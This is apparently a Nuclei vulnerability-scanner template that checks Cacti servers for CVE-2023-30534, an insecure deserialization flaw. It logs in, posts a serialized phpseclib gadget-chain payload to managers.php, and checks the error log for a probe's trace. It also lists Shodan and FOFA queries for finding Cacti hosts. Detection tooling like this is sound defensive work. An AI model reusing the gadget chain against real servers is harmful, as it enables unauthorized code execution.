id: CVE-2023-30534

info:
  name: Cacti < 1.2.25 Insecure Deserialization
  author: k0pak4
  severity: medium
  description: |
    Cacti is an open source operational monitoring and fault management framework. There are two instances of insecure deserialization in Cacti version 1.2.24.
  remediation: This issue has been addressed in version 1.2.25.
  reference:
    - https://github.com/Cacti/cacti/security/advisories/GHSA-77rf-774j-6h3p
    - https://nvd.nist.gov/vuln/detail/CVE-2023-30534
    - https://www.fastly.com/blog/cve-2023-30534-insecure-deserialization-in-cacti-prior-to-1-2-25
    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CFH3J2WVBKY4ZJNMARVOWJQK6PSLPHFH/
    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WOQFYGLZBAWT4AWNMO7DU73QXWPXTCKH/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 4.3
    cve-id: CVE-2023-30534
    cwe-id: CWE-502
    epss-score: 0.09326
    epss-percentile: 0.94688
    cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: cacti
    product: cacti
    shodan-query:
      - title:"Cacti"
      - http.title:"login to cacti"
      - http.title:"cacti"
      - http.favicon.hash:"-1797138069"
    fofa-query:
      - icon_hash="-1797138069"
      - title="cacti"
      - title="login to cacti"
    google-query:
      - intitle:"cacti"
      - intitle:"login to cacti"
  tags: cve,cve2023,cacti,authenticated

http:
  - raw:
      - |
        GET /index.php HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        __csrf_magic={{url_encode(csrf_token)}}&action=login&login_username={{username}}&login_password={{password}}

      - |
        POST /managers.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=actions&action_receiver_notifications=1&selected_items=a%3A2%3A%7Bi%3A7%3Ba%3A1%3A%7Bi%3A0%3BO%3A18%3A%22phpseclib%5CNet%5CSSH1%22%3A2%3A%7Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3BO%3A19%3A%22phpseclib%5CCrypt%5CAES%22%3A8%3A%7Bs%3A10%3A%22block_size%22%3BN%3Bs%3A12%3A%22inline_crypt%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A25%3A%22phpseclib%5CCrypt%5CTripleDES%22%3A6%3A%7Bs%3A10%3A%22block_size%22%3Bs%3A30%3A%221%29%7B%7D%7D%7D%3B+ob_clean%28%29%3Blsdie%28%29%3B+%3F%3E%22%3Bs%3A12%3A%22inline_crypt%22%3BN%3Bs%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3B%7Di%3A1%3Bs%3A26%3A%22_createInlineCryptFunction%22%3B%7Ds%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3Bi%3A1%3B%7D%7D%7Di%3A7%3Bi%3A7%3B%7D&drp_action=2&__csrf_magic={{url_encode(csrf_token)}}

      - |
        GET /clog.php HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: regex
        part: body_4
        regex:
          - "<table[^;]*;['\"]>\\s*(<tr class=['\"]clogError['\"]>[\\s\\S]*unserialize[\\s\\S]*managers.php[\\s\\S]*[Aa]uthenticated)"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: csrf_token
        part: body
        group: 1
        regex:
          - "var csrfMagicToken = ['\"]([a-z0-9,:;]*)['\"]"
        internal: true
# digest: 4a0a0047304502210083008a3793277d849d64ea59458090e4fd2be2ad78e2a8606675d58d5304f386022015a1039607a70aeb3c85adaa3626ab3b72da216d97120e78bbd5267c1c565608:922c64590222798bb761d5b6d8e72950